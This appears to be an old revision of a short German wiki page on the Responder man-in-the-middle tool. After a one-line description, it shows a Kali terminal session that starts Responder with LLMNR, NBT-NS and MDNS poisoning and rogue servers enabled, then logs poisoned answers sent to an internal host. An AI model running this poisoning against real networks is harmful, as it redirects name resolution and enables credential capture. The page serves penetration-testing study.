Dies ist eine alte Version des Dokuments!
Responder ist ein MitM Tool der als Honeypod verwendet werden kann. Es ist in Python geschrieben.
┌──(kali㉿kali)-[~]
└─$ sudo responder -I eth0 -w
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [172.21.1.167]
Responder IPv6 [fe80::8a3:49dd:21d2:71dc]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-3X5P4N3GA2D]
Responder Domain Name [7B59.LOCAL]
Responder DCE-RPC Port [46277]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[*] [NBT-NS] Poisoned answer sent to 172.21.0.19 for name VIE-PC-GBT046 (service: Workstation/Redirector)
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name STP-SRV-GEST001.local
[*] [NBT-NS] Poisoned answer sent to 172.21.0.19 for name STP-SRV-GEST001 (service: Workstation/Redirector)
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name VIE-PC-GBT046.local
[*] [NBT-NS] Poisoned answer sent to 172.21.0.19 for name STP-SRV-GEST001 (service: Workstation/Redirector)
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name VIE-PC-GBT046.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name VIE-PC-GBT046.local
[*] [NBT-NS] Poisoned answer sent to 172.21.0.19 for name VIE-PC-GBT046 (service: Workstation/Redirector)
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name STP-SRV-GEST001.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name VIE-PC-GBT046.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name STP-SRV-GEST001.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name STP-SRV-GEST001.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name VIE-PC-GBT046.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name STP-SRV-GEST001.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name VIE-PC-GBT046.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name STP-SRV-GEST001.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name VIE-PC-GBT046.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name VIE-PC-GBT046.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name STP-SRV-GEST001.local
[*] [MDNS] Poisoned answer sent to 172.21.0.19 for name STP-SRV-GEST001.local
[+] Exiting...
┌──(kali㉿kali)-[~]
└─$